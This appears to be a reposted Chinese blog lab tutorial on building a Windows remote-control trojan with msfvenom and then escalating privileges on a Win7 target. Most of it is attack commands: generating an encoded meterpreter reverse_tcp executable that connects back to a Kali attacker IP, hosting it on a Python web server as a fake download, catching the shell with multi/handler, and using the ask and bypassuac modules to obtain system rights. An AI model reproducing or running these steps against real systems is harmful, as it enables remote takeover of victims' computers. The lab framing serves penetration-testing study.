zoukankan      html  css  js  c++  java
  • 生成远程控制木马以及提权

    远程控制木马以及提权

    Kail攻击机IP: 192.168.199.216

    Win7靶机IP:  192.168.199.132

    Kali Linux 2中提供了多个可以用来产生远程控制被控端程序的方式,但是其中最为简单强大的方法应该要数Msfvenom命令了。这个命令是著名渗透测试软件Metasploit的一个功能。

    以前旧版本的Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。

    这里面的参数很多,但是实际使用起来很简单,例如我们如果只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序(通常可以使用Metasploit中内置的被控端程序)

    举例:

    root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe

    生成一个远程控制木马,注意参数不要错

    1 msfvenom  -a x86 -platform windows -p(pyaload)  windows/meterpreter/reverse_tcp  lhost=kaliip  port=4444 -b"x00"(删掉null字符截断) 
    -e(编码器,很多,自找) x86/shikata_ga_nai -i(次数) 10 -f(form格式) exe >msf.exe(在root下生成一个msf文件即远控木马) 2 3 msfvenom -a x86 -platforms windows -p windows/meterpreter/reverse_tcp lhost=192.168.199.216 lport=4444 -b "x00" -e x86/shikata_ga_nai -i 10 -f exe >msf.exe

    在root文件下可以看到一个exe文件

    试一试handler监听模块,并配置监听脚本

    use exploit/multi/handler

    默认的payload是generic/shell_reverse_tcp,所以需要改,并开始监听run

    接下来可以直接利用python语句挂一个简单http服务器

    1 python -m SimpleHTTPServer 800(大小写注意)

    模拟用户在恶意网站192.168.199.216:800下了一个软件,安装并运行。

     

    点击运行,可以看到反弹了一个meterpreter。

    但只是普通管理员的权限,无法创建用户,也无法更换系统权限。

     

    我们可以通过提高程序的运行级别、绕过UAC,和提权漏洞进行更换系统权限。

    下面只展示提高程序运行级别和绕过UAC两种方法。

     

    提高程序的运行级别(特殊模块)

    主动提问模块,主动向用户申请系统权限。info查看需要的参数(require参数为yes必填),

    Sessions1是刚才handler时没有改payload产生的shell。我们使用没有系统权限的session3

    Win7自动弹窗,点击是,得到会话窗口

    绕过UAC提权(特殊模块)

    也可以利用另外一些模块use exploit/windows/local/bypassuac

    有很多相关的,选一个最简单的

    可以用info查看模块原理

    use exploit/windows/local/bypassuac

    payload默认是反弹tcp

    show options

    只需要补上session

    使用没系统权限的的session3

     

  • 相关阅读:
    Dotnet微服务:使用HttpclientFactory实现服务之间的通信
    Dotnet微服务:使用Steeltoe集成Eureka
    Lora服务器:Chirpstack连接Lora网关实战
    linux远程windwos软件rdesktop
    kali笔记
    ubuntu笔记
    Swagger使用
    Swagger接口导入Yapi
    Nexus上传自己本地jar包 和下载maven中央仓库里的包到nexus
    docker安装rabbitmq
  • 原文地址:https://www.cnblogs.com/dork/p/13756927.html
Copyright © 2011-2022 走看看